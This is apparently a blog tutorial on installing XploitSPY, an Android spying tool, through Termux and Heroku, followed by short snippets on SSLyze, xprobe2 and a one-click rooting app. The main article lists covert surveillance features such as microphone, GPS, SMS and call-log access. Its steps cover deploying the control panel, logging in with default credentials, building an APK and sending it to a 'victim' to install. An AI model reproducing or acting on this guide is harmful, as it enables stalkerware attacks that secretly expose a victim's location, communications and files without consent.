Skip to main content

How to install xploitspy in termux

Hello guy's in this article we are going to discuss about How to install xploitspy in termux. This xploitspy will help you to monitor any mobile phone.

What is Xploitspy?

Xploitspy is a free tool it will help you to monitoring any kind of android phone with lot of future.

Requirement's

  • Android version 5.0 and above
  • Termux
  • Heroku account
  • python
  • Nodjs

Future

  • Android information
  • Gps
  • Microphone
  • Contact
  • Call logs
  • Notification log
  • clipboard log
  • Sms manager
  • Wifi manager
  • manage installed apps
  • Access file manager
  • Access downloads

How to install xploitspy in termux?

This tool installation was very long process so don't skip this article read fully

Step 1:

First you going to this blow website
 https://www.heroku.com/ 

Now just click sing up tap and create new account 

Once you fill the above image details just click sing up button. Now the password generation link was sent by you given mail id. so open your mail and set your password

Note:

Programming language must be nodejs 
Once you set your password this page will automatically redirect to your account now you have to create app so click create app button.The image was given above

 Now it will ask to app name so type unique name and press create app button.

Now you app was successfully created Now you remember your app name, email id and password because that will help you to create monitoring app.

Step 2:

Now open your termux application and update completely. Just type this below command to update your termux.
apt update && apt upgrade

Step 3:

Now you type this below command this command will help you to install git package This git package will help you to clone the package.
pkg install git

Step 4: 

Once you install git package type this below command this command will help you to install nodejs package.
pkg install nodejs

Step 5:

Once you install nodejs package just type this below command this command will help you to clone the Xploitspy package.
git clone https://github.com/XploitWizer/XploitSPY

 

Step 6:

Now type this below command this command will help you to open xploitspy folder.
cd XploitSPY

Step 7:

Once you open xploitspy folder type this below command this command will help you to install heroku in your termux.
 npm install heroku -g

Step 8:

Now you type this below command this command will help you to login your heroku account in your termux.
heroku login -i

If you execute this above command in your termux it will ask your heroku username and password just type it.

Step 9:

Once you login heroku account type this below command this command will help you to access your heroku apk in termux.
heroku git:remote -a ( your app name)

Step 10:

Now type this below command this will help you to build your packs with jvm.
heroku buildpacks:add heroku/jvm

Step 11:

Now type this below command this will help you to build your nodejs packs.
heroku buildpacks:add heroku/nodejs

Step 12:

Once you build nodejs packs type this below command this will help you to access exploitspy web interface
git push heroku master

If you execute this above command you will get one link if did not get any link means just type this below two commands one by one.

git pull
git push -f heroku master

Now definitely you will get link after that just copy and past your browser now you will see xploitspy login page.

Xploitspy username: admin

xploitspy password: password

Once you login xploitspy now you can see apk builder tab. just click that tab and build new apk once you build download that apk after that sent victim mobile and install. That's it guy's now you can easily monitoring.

I hope this article help you lot. if you have any doubt's means please command below. if you need this kind of article please follow me. Thankyou     

Comments

Popular posts from this blog

Sslyze-analyze the SSL configuration of a server by connecting to it

 What is SSLyze? SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Feature of Sslyze Multi-processed and multi-threaded scanning (it’s fast) SSL 2.0/3.0 and TLS 1.0/1.1/1.2 compatibility Performance testing: session resumption and TLS tickets support Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more Server certificate validation and revocation checking through OCSP stapling Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP and FTP Support for client certificates when scanning servers that perform mutual authentication XML output to further process the scan results How to install sslyze Just you type this below command in your terminal this command's will help you to install sslyze on your computer and termux. Linux sudo apt-get install ssl...

xprobe2 - A Remote active operating system fingerprinting tool

What is Xprobe2? xprobe2 - A Remote active operating system fingerprinting tool xprobe2 is an active operating system fingerprinting tool with a different approach to operating system fingerprinting. xprobe2 relies on fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database. The operation of xprobe2 is described in a paper titled " xprobe2 - A 'Fuzzy ' Approach to Remote Active Operating System Fingerprinting" Option's How to install Xprobe2 First you need to open your terminal after that you type this below command in your terminal this command will help you to install this xprobe2 package. Linux sudo apt install xprobe Termux pkg install xprobe How to use xprobe Just use this below command or see this below image. sudo xprobe2 ( Domain name ) Example's xprobe2 -v -D 1 -D 2 192.168.1.10 Will launch an OS fingerprinting attempt targeting 192.168.1.10. Modules 1 and 2, which are reachability tests, will be di...

Root android phone with one click without computer

 What is framaroot? Framaroot is a free android app which can root almost every device in one click without any need of PC/Computer. Framaroot has its own complex exploits which vary from device to device according to its chipset model and android version. In newer versions of Framaroot, you can unroot your android phone in one click too Feature of Framaroot Root android phone with one click Install SuperSu Unroot or execute Advanced user How to Download and install Framaroot First you download framaroot application on your android phone so click this below download button. Now Install it with a file explorer or directly from your internet browser, if android warn you about security risk, say OK and check Unknown sources to allow install of applications outside of Play Store. How to use Open your Framaroot and select one of the following action: Install SuperSU, Unroot or Execute script (for advanced users) Possible case once application is launched A popup saying "Your device see...